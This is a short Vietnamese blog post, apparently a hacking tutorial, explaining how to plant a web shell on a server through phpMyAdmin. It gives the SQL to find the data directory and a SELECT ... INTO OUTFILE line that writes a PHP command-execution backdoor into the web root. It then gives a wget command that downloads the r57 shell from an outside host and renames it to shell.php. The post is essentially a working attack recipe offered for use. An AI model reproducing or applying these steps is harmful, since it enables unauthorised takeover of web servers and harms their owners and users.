- Phải biết path của server, để làm được điều đó, tại SQL các bạn run lệnh:
Trích dẫn:SELECT @@datadir
Bắt đầu nào
Đầu tiên là login vào phpmyadmin
Bây giờ click vào "Show MySQL system varible"
Sau đó chuyển qua SQL
Lúc này các bạn có thể chạy các lệnh SQL như tạo db, xóa bảng hoặc bất cứ điều gì, ở đây chúng ta cần là up shell.
Bây giờ chúng ta sẽ tạo một dòng cmd vào một file mới.
Trích dẫn:SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "full/path/here/cmd.php"
Mình ví dụ ở đây Server dùng Xampp (path public của xampp là [X]:\xampp\htdocs\)
Click "Go"
Bây giờ, file cmd.php là ở đây http://site.com/cmd.php
Tại cmd.php, chúng ta sẽ run lệnh này để download con shell ở dạng txt về và change thành php
Trích dẫn:wget http://www.r57.biz/r57.txt;mv r57.txt shell.php
Và sau đó là thành quả
P/s: Đây chỉ là 1 bài cho các bạn tham khảo cách up shell thông qua phpmyadmin. Vẫn còn nhiều cách để up. Mình sẽ viết sau 
0 nhận xét:
Đăng nhận xét